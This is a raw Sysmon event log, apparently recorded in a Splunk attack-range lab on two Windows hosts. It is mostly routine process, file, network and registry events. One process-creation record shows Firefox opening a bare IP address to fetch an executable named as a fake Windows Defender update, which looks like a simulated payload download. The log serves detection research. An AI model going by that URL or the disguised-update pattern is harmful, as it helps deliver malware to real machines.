12:25:15.137{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892300C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044862Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.137{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892300C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044861Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.137{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892300C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+2d107|c:\windows\system32\rpcss.dll+303f2|c:\windows\system32\rpcss.dll+3d6ba|C:\Windows\System32\RPCRT4.dll+6afb8|C:\Windows\System32\RPCRT4.dll+2eeb9|C:\Windows\System32\RPCRT4.dll+2ecd3|C:\Windows\System32\RPCRT4.dll+144f4|C:\Windows\System32\RPCRT4.dll+14971|C:\Windows\System32\RPCRT4.dll+11c3d|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044860Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.109{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044859Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.103{FE4C2B44-E52B-63C7-6206-00000000AF02}14326180C:\Windows\system32\conhost.exe{FE4C2B44-E52B-63C7-6106-00000000AF02}1144C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044858Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.084{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=B7774759097C6AD5CCD7B63A6433D221,SHA256=CBF2AA7261229BB5AB5C59A8EC69B667B9CE088799A339E7CA3EF96B2FAC2DAF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044857Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.084{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E52B-63C7-6206-00000000AF02}1432C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x800000000000000044856Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.084{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=0A7DE90C4FEE8C02209D705233DDC491,SHA256=4BB36ECC309FEDA5718528A250F2F148337BF8C7EF84187EB610867E30FA1DB3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044855Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.084{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E52B-63C7-6206-00000000AF02}1432C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044854Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.084{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044853Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.084{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044852Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.084{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044851Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.084{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044850Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.084{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E52B-63C7-6106-00000000AF02}1144C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044849Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.084{FE4C2B44-E4A2-63C7-4806-00000000AF02}32405364C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E52B-63C7-6106-00000000AF02}1144C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\Mozilla Firefox\xul.dll+2227102|C:\Program Files\Mozilla Firefox\xul.dll+2226f05|C:\Program Files\Mozilla Firefox\xul.dll+2226f51|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|C:\Program Files\Mozilla Firefox\xul.dll+1e7daf6|C:\Program Files\Mozilla Firefox\xul.dll+188f6af|C:\Program Files\Mozilla Firefox\xul.dll+121c68|C:\Program Files\Mozilla Firefox\xul.dll+164f8d3|UNKNOWN(000003DBBB3E4B31) 154100x800000000000000044848Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.087{FE4C2B44-E52B-63C7-6106-00000000AF02}1144C:\Program Files\Mozilla Firefox\pingsender.exe109.0-FirefoxMozilla Foundationpingsender.exe"C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/b0eb9103-ffcb-4188-85af-c760aec3080e/new-profile/Firefox/109.0/release/20230112150232?v=4 C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\b0eb9103-ffcb-4188-85af-c760aec3080e https://incoming.telemetry.mozilla.org/submit/telemetry/c5ecaf30-3980-401a-a9bc-0d5c18d84b76/event/Firefox/109.0/release/20230112150232?v=4 C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\c5ecaf30-3980-401a-a9bc-0d5c18d84b76 https://incoming.telemetry.mozilla.org/submit/telemetry/88d37fff-6564-4b42-8b15-1d44b80899f3/main/Firefox/109.0/release/20230112150232?v=4 C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\88d37fff-6564-4b42-8b15-1d44b80899f3C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2MediumMD5=81936B521FDC389CAE219484DEC34395,SHA256=6FB414545198766879F8420A7F09C5B06108A61310E7D113FB4565F1195D60AC,IMPHASH=AF27FA7223A9B6FE80447A0E6715E632{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://45.139.105.143/d/rsWinDefendUpdateCheck.exe 10341000x800000000000000044847Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.084{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E52B-63C7-6106-00000000AF02}1144C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044846Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:15.084{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\aborted-session-pingMD5=1B9B005986BB2C5845376780AF53A793,SHA256=A0791ABEBF1ADF779E03422596B9086ACDD3179C6B73ABE309E5999459722DD0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017345Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:12.951{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50134-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017344Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:15.109{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8C04A322D3AE360CD6110850F8BF156,SHA256=4B7C6EFA93CB3D2D7599A5A221147FF5FD81ABBC229FA13AD574959D9C79D2F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017343Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:15.056{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\surveyor-20230118114717-037MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044878Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.238{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local63796- 354300x800000000000000044877Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.235{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local52350- 23542300x800000000000000044876Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:16.352{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97CEBB4F7413C57E3CC17F6ED967953A,SHA256=5B51B55711CF488C6DA70F1012B6D159F986CC0FD43BB20422D060050C13BDD6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044875Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:16.352{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5812F542826AE78953E4D597165FD455,SHA256=9710AAD45619B63477A267BD4720842FB64678961A49E67DDB590FDE71A76A5D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017347Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:16.447{E5A8D418-DC43-63C7-1200-00000000B002}1012NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=775CA6CD07B28A1CBDB7081E18B32113,SHA256=3BA037566AFBA2C01D4F2765C6E4DA2F639D3109186212EAB5A9B4B5D4521928,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017346Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:16.088{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62E478A2877AD9DA03852E74CC37C0C7,SHA256=EDB4BE669FE514B0AA259B952F379A0D070C7E4B7811117B57560C0E054B5770,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044880Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:17.479{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BE97B95164F4C20117BF05195612F4C,SHA256=B29133F5D8BAC660D16552D81133609F5524E13FA0DE6D0155D913B1D7D313AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000044879Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:14.711{00000000-0000-0000-0000-000000000000}1144<unknown process>-tcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56403-false34.120.208.123123.208.120.34.bc.googleusercontent.com443https 13241300x800000000000000017358Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:25:17.443{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000017357Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:25:17.443{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0022dde7) 13241300x800000000000000017356Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:25:17.443{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d92b2f-0x8a9787aa) 13241300x800000000000000017355Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:25:17.443{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d92b37-0xec5befaa) 13241300x800000000000000017354Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:25:17.443{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d92b40-0x4e2057aa) 13241300x800000000000000017353Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:25:17.443{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000017352Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:25:17.443{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0022dde7) 13241300x800000000000000017351Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:25:17.443{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d92b2f-0x8a9787aa) 13241300x800000000000000017350Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:25:17.443{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d92b37-0xec5befaa) 13241300x800000000000000017349Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:25:17.443{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d92b40-0x4e2057aa) 23542300x800000000000000017348Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:17.162{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EF878E28617AF90ECEF8634F7E7A92C,SHA256=2E48B6675B5DB4414B94AD0AED5DFCD767963EEAE856923EAEDDB7F728B4D5C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044881Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:18.474{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A505062EAA044C146583B38DB8DC5DA,SHA256=2354768DAF5923BF18AD8D9E275AB236A9A32172E64B9731B46D22465282B61F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017359Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:18.234{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E8DD8D83A9641768041653E0136B052,SHA256=6829E69ABEBC492B013A77FFB1B3DCD6DCCA0C3FC251B1A4B4DE9F18B573B574,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044883Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:19.581{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 